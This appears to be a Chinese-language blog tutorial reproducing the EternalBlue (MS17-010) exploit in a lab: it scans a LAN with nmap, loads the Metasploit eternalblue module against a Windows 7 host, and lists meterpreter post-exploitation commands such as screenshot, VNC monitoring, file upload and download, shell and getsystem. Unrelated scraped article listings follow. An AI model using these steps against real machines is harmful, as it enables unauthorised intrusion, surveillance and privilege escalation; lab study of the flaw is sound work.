配置需求:

1、攻击机:Kali Linux (IP:192.168.1.100)

2、目标靶机:Winodws7

3、同一局域网

前言:

只知道目标靶机处于同一局域网的情况下,对目标靶机进行渗透攻击,仅供学习参考!

一、扫描目标靶机

第一步,首先找到有永恒之蓝漏洞的主机

输入命令nmap -sS -Pn 自身网段/24如果知道目标IP地址只需nmap 目标IP

nmap -sS -Pn 网段/24

nmap 自身网段/24能够扫描自身网段下的所有主机,以及它们所开启的服务

可以看到IP地址为192.168.1.6的主机,开启了445端口(open),找到目标靶机后就可以进行第二个步骤

二、Metasploit渗透

输入命令msfconsole进入

msfconsole

再输入search ms17-010来查找模块

search ms17-010

下面为两个可以利用的模块,但我们只需要采用#=0的攻击模块

之后我们再来加载模块

use exploit/windows/smb/ms17_010_eternalblue

 search查询过后,也可以用use 编号来选择模块的

再输入show options来查看配置

show options

Required为yes的都需要进行配置

set rhosts 192.168.1.6

最后输入run或者exploit进行攻击

进入后,可以输入help查看有哪有功能

例如screenshot将对方屏幕截图并保存下来

screenshot

再列举几个比较好用的

run vnc    //获取对方屏幕(监控屏幕)
uoload     //上传文件
download   //下载文件
shell      //命令符模式
getsystem  //进行提权
getuid     //查看权限
ps         //查看进程

从入门到入狱

一、Kali Linux配置IP

二、Kali Linux实现ARP欺骗攻击

三、Kali Linux复现永恒之蓝漏洞相关推荐

  1. metasploit复现永恒之蓝漏洞

    Table of Contents 0x01 设备 0x02 条件 0x03 漏洞复现 0x04 漏洞利用 00x0 后话 0x01 设备 内置metasploit的kali Linux: win7. ...

  2. 【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)

    目录 1 MSF框架 1.1 MSF简介 1.2 MSF五大模块类型 1.3 渗透攻击步骤 1.4 小结 2 实验简介 2.1 永恒之蓝简介 2.2 实验环境 2.3 实验目的 3 实验前准备 3.1 ...

  3. msf之ms17-010永恒之蓝漏洞

    ** 文章主旨: ** 1.熟悉msf的基本用法. 2.熟悉一些渗透中会用到基本的windows命令. 3.复现永恒之蓝漏洞. 漏洞原理: 通过向Windows服务器的SMBv1服务发送精心构造的命令 ...

  4. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  5. 永恒之蓝漏洞复现(ms17-010)

    文章目录 一.永恒之蓝(Eternal Blue) 二.复现环境 三.复现过程 1.主机发现 2.进入MSF框架 3.使用ms17-010扫描模块,对靶机进行扫描 3.1使用模块 3.2查看模块需要配 ...

  6. 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现

    文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...

  7. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  8. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

  9. ms17-010永恒之蓝漏洞复现

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.测试环境准备 1.安装VMware 2.安装攻击机(kali镜像) 1.安装靶机(win7) 二.测试前准备工作 ...

最新文章

  1. Python构建lassocv模型并输出Rad-score公式
  2. 如何锁定计算机硬盘,Win7系统怎么锁住磁盘|Win7系统锁住磁盘的详细步骤
  3. Ampzz 2011 Cross Spider 计算几何
  4. 永洪科技携手华为构建金融智慧运营与商业智能方案,解决金融敏捷分析难题
  5. linux 修改时间的命令,Linux 常用命令(查看版本、修改系统时间)
  6. VTK:直线网格之RectilinearGridToTetr​​ahedra
  7. html触发js参数怎么用,js 绑定带参数的事件以及手动触发事件
  8. JAVA拳皇_拳皇(Java简单的小程序)代码实例|chu
  9. centos上安装adobe flash
  10. linux内核的队列实现移植
  11. 1929. 数组串联
  12. Linux如何使用GPG(GNU Privacy Guard)对信息/文件进行加密和解密
  13. 洛谷 P4344 [SHOI2015]脑洞治疗仪
  14. caffe测试单张图片
  15. 【数据库】SQL建表
  16. 云计算IaaS核心技术全景指南
  17. 5类6类7类网线对比_超6类7类8类网线进来挨打 6类线全面测评 网速和传输速率测试...
  18. 2021招生之友+录取统计_电子版免费分享
  19. 梦幻手游最新服务器,梦幻西游手游最新要合并哪些服务器 最新合区汇总
  20. echart改变折线图和折线点的颜色以及折线点的大小

热门文章

  1. matlab如何修复照片裂纹,把撕裂破旧老照片修复还原的PS技巧
  2. Linux arm 内核选项和busybox选项 加载tun模块 -- 创建/dev/tun 字符设备
  3. BOSSGOO平台免费使用
  4. 高中计算机教案excel,[转载]高中信息技术教案(第三章Excel)
  5. 数学建模、运筹学之非线性规划
  6. js元素距离和鼠标位置整理
  7. 不知道干些什么,那就看看书吧!
  8. win10深澜校园网客户端拨号错误失败的解决办法
  9. .o/.obj 文件的组成格式
  10. 安卓应用SHA1的获取并在Unity中打包发布